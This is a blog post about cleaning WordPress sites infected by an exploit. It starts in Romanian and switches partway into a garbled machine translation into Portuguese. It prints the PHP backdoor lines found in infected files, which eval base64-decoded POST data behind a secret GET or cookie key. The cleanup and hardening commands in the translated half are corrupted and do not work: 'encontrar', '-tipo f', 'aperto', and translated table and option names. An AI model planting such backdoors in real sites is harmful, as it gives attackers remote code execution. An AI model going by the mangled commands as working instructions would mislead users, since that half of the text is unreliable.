Inainte sa cititi acest post, trebuie sa vedeti postul de aici, ca sa intelegeti ceva. :)
Am gasit in mai multe fisiere ale blogurilor de pe stealthsettings.com, coduri asemanatoare cu cele de mai jos, aparute ca urmare a virusarii cu exploitul de WordPress.:
<?php if($_GET[‘573abcb060974771’]==”8e96d1b4b674e1d2″){ eval(base64_decode($_POST[‘file’])); exit; } ?>
e
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>
In cazul de mai sus este vorba despre fisierul xmlrpc.php do Somnoros, dar la un grep pe server, se vede ca sunt destul de multe coduri de acest gen in surse.
Curatare fisiere infectate:
Ooookkkk…
1. Cea mai buna solutie, dupa ce este facut backup-ul si curatata baza de date, este sa EXCLUIR fisierele de WordPress (puteti pastra wp-config.php si fisierele care nu tin strict de platforma wp, dupa ce sunt atent verificate) de pe server si sa faceti upload la cele originale din versiunea 2.5.1 (cu ocazia asta faceti si un upgrade de versiune wp :) ): http://wordpress.org/download/ . Stergeti inclusiv fisierele temei, daca nu aveti incredere ca puteti face o verificare atenta a lor.
Se vede ca au fost afectate si fisiere ale temelor care nu au fost folosite niciodata pe blog si simpla schimbare a temei, nu rezolva aceasta problema.
./andreea/wp-content/themes/default/index.php:<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?><?php get_header(); ?>
2. Cautati si stergeti toate fisierele care contin : *_new.php, *_old.php, *.jpgg, *.giff, *.pngg si fisierul wp-info.txt, daca exista.
find . -name “*_new.php”
find . -name “*_old.php”
find . -name “*.jpgg”
find . -name “* _gif”
find . -name “*_pngg”
find . -name “wp-info.txt”
3. em /tmp , pesquise e exclua pastas como tmpYwbzT2
Limpeza SQL :
1. Na mesa mesa WP_Options Veja se você existe e exclua as linhas: links_internos_cache, Assim, rss_f541b3abd05e7962fcab37737f40fad8 e opções_wordpress.
2. Também em WP_OPTIONS, vá para plugins_ativos E exclua se existir, um plugin que termine em uma das extensões *_new.php, *_old.php, *.JPGG, *.Giff, *.pngg ou se houver outra extensão suspeita, verifique com atenção.
3. Na mesa wp_users, veja se há algum usuário que não tem nada para escrever ao lado dele, na coluna usuário_nicename. Exclua este usuário, mas mantenha o número na coluna ID. Este usuário é possível usar "wordpress" como usuário_login E parece ter sido criado em 00:00 0000-00-00.
4. Vá para a mesa wp_usermeta e exclua todas as linhas que pertencem ao ID acima.
Após ter feito essa limpeza do SQL, desative e depois ative algum plugin. (no blog -> Painel -> Plug-ins)
Segurança do servidor:
1. Veja quais diretórios e arquivos estão”gravável"(CHMOD 777) e tente colocar neles um chmod o que não permitirá mais que eles escrevam em nenhum nível. (CHMOD 644, por exemplo)
encontrar . -perm -2 –ls
2. Veja quais arquivos definiram o bit sul ou patim . Se você não usar esses arquivos, coloque-os chmod 0 ou desinstale o pacote que contém. Eles são muito perigosos, porque atuam com privilégios”grupo"Ou"raiz“E não com os privilégios do usuário normal que executa esse arquivo.
encontrar / -tipo f -perm -04000 -ls
encontrar / -tipo f -perm -02000 -ls
3. Verifique quais portas estão abertas e tente fechar ou proteger aquelas que não são utilizadas.
NetStat -an | aperto -i lista
É isso. Eu vejo isso Alguns blogs são Banate Pela Pesquisa Google e outros dizem "muito bem !!!" . Bem, eles teriam feito isso ... Mas o que você diria se o Google começasse a ganhar dinheiro todos os sites quem faz SE SPAM e cavalos de Tróia (Trojan.Clicker.HTML) em biscoitos?
1 pensou em “WordPress Exploit – Curatare fisiere virusate, SQL si securizare server.”